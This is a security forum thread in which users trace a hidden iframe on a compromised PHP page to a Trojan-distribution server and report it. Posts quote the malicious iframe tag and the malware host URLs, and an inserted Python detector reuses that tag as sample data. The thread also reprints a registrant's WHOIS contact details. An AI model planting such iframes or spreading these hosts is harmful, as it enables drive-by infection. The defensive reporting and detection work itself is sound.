
Thread: Horsie.......

  1. #11
    FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.
    <iframe width=2 height=2 style=visibility:hidden src='http://85.255.113.10/?to=GLAC&from=se-all&type=se-all'></iframe>
    That site is down with a message saying the account is suspected due to violation of AUP - good.

    Kinda hoped to pull down that horsie and analyze and dissect it, oh well.
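    The hidden iframe quoted above is the classic "tiny or invisible frame pointing at a third-party host" pattern. Below is an added example (not code from the thread or any poster) that scans an HTML page for iframes that are hidden by size or style and reports where they point; the sample page is constructed for the example and the 10-pixel size threshold is an assumption.

```python
"""Flag hidden or tiny iframes in an HTML document and report their targets."""
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Assumption for this example: frames this small or smaller are treated as hidden.
MAX_HIDDEN_DIMENSION = 10


class HiddenIframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}  # attribute names are already lowercased
        reasons = []
        for dim in ("width", "height"):
            val = a.get(dim, "").rstrip("px")
            if val.isdigit() and int(val) <= MAX_HIDDEN_DIMENSION:
                reasons.append(f"{dim}={val}")
        style = a.get("style", "").replace(" ", "").lower()
        for marker in ("visibility:hidden", "display:none"):
            if marker in style:
                reasons.append(marker)
        if not reasons:
            return  # a normally sized, visible iframe is not suspicious by itself
        src = a.get("src", "")
        parts = urlsplit(src)
        self.findings.append({
            "src": src,
            "host": parts.hostname or "",
            "query": {k: v[0] for k, v in parse_qs(parts.query).items()},
            "reasons": reasons,
        })


def find_hidden_iframes(html):
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: the first iframe is the one quoted in the thread,
# the second is a normal visible embed that must not be flagged.
SAMPLE_PAGE = """<html><body>
<iframe width=2 height=2 style=visibility:hidden src='http://85.255.113.10/?to=GLAC&from=se-all&type=se-all'></iframe>
<iframe width="600" height="400" src="https://example.invalid/video"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE):
        print(f"hidden iframe -> {f['host']} {f['query']} ({', '.join(f['reasons'])})")
```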

  2. #12
    T3h Ch3F
    Join Date
    Sep 2001
    Posts
    718
    Originally posted here by ric-o
    FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.

    That site is down with a message saying the account is suspected due to violation of AUP - good.

    Kinda hoped to pull down that horsie and analyze and dissect it, oh well.

    Still a live link, just got another (same one as before) Trojan in my Quar.

    W32/Sober@MM!M681


    Get some good religion from Bad Religion.

  3. #13
    Member
    Join Date
    Sep 2005
    Posts
    77
    http ://85.255.113.10/ ?to=GLAC&from=se-all&type= se-all

    One Whois lookup says its from the Ukraine.... another says its from Belarus:

    Country fraud profile: High
    Georgia prison wardens......Ukrainian mafioso....
    Hmmm
    %42%75%75%75%75%72%70%21%00

  4. #14
    They call me the Hunted (foxyloxley)
    Join Date
    Nov 2003
    Location
    3rd Rock from Sun
    Posts
    2,534
    One Whois lookup says its from the Ukraine.... another says its from Belarus:
    same area of land
    and Georgia is also out there too
    not just in the USofA

    maybe that's how you picked such a lovely site

    and clicking the link sent AVG nuts
    got two hits

    those two hits have different dates on em
    but I am certain I've checked the vault recently, and I haven't sent anything else there for a while
    so now I'm in my SIXTIES FFS
    WTAF, how did that happen, so no more alterations to the sig, it will remain as is now

    Beware of Geeks bearing GIF's
    come and waste the day :P at The Taz Zone

  5. #15
    T3h Ch3F
    Join Date
    Sep 2001
    Posts
    718

    !!!!!!!!!!

    No response via telephone to the site host, sent a very polite e-mail, we will see if they respond. I have my doubts.

    Get some good religion from Bad Religion.

  6. #16
    Jaded Network Admin (nebulus200)
    Join Date
    Jun 2002
    Posts
    1,356

    Re: !!!!!!!!!!

    Originally posted here by Galdron
    No response via telephone to the site host, sent a very polite e-mail, we will see if they respond. I have my doubts.

    You might try DShield/ISC/SANS's fight back...just report it to them, maybe you'll even get a mention in their daily diary. That's what I usually do to submit things semi-anonymously.
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  7. #17
    Banned
    Join Date
    Jul 2006
    Location
    /
    Posts
    385
    Originally posted here by nihil
    Hi acidtone, can you submit them to these sites:

    http://virusscan.jotti.org/

    http://www.virustotal.com/en/indexf.html

    It would be interesting to see what the major AV products make of them?

    Nihil, I've already submitted them; I did so about 30 minutes after catching them into a contained environment.

    cheers
    acidtone..

  8. #18
    T3h Ch3F
    Join Date
    Sep 2001
    Posts
    718

    Re: Re: !!!!!!!!!!

    Originally posted here by nebulus200
    You might try DShield/ISC/SANS's fight back...just report it to them, maybe you'll even get a mention in their daily diary. That's what I usually do to submit things semi-anonymously.

    Done deal.

    Get some good religion from Bad Religion.

  9. #19
    T3h Ch3F
    Join Date
    Sep 2001
    Posts
    718

    The continuing saga

    Damnit I am obsessed!


    OK so I just can't let this one go, after zero response to both methods (telephone, and e-mail) to the host of the offending website, I am once again digging for more info.


    I did report it to DShield, and they are so backed up it will take a while for them to "act", which means they will send an e-mail to the Sysadmin, and hope that action will be taken. Basically the same thing I have attempted.

    Knowing that the Horsie is there, I have no fear in rooting around within the site. I noticed today that the actual Trojan originates from the following site. Apparently notorious for this activity and also registered in Russia..........good luck getting any results from these guys right?

    The site you will notice serves no purpose, other than to support the Downloader/Trojan, and god knows what else.

    http://proffy209.com/

    Dig-

    Registrant:
    Boris D Gorbunov boris@bo.ca
    7.49800872092
    Boris D Gorbunov
    Proletarskaya 3-10
    Nijnoy Novgorod Nijniy Novgorod RUSSIAN FEDERATION 180092
    Domain Name: proffy209.com
    Record last updated at 2006-07-13 12: 42: 55
    Record created on 2006/7/13
    Record expired on 2007/7/13
    Domain servers in listed order:
    ns1.game4all.biz ns2.game4all.biz
    Administrator:
    name: (Boris D Gorbunov)
    Email: boris@bo.ca
    tel-- 7.49800872092
    Boris D Gorbunov
    Proletarskaya 3-10


    Boris I would like to kick your Caviar eating a$$.

    The Virus itself is also known as TR/Dldr.Tibs.C, which copies itself to %SYSDIR%\kernels8.exe, and is a multifaceted little bugger.

    Further info can be found @ link below.

    http://www.avira.com/en/threats/sect...dr.tibs.c.html


    Any thoughts/Ideas/suggestions regarding these A$$hats would be great. I am on a mission.

    Get some good religion from Bad Religion.
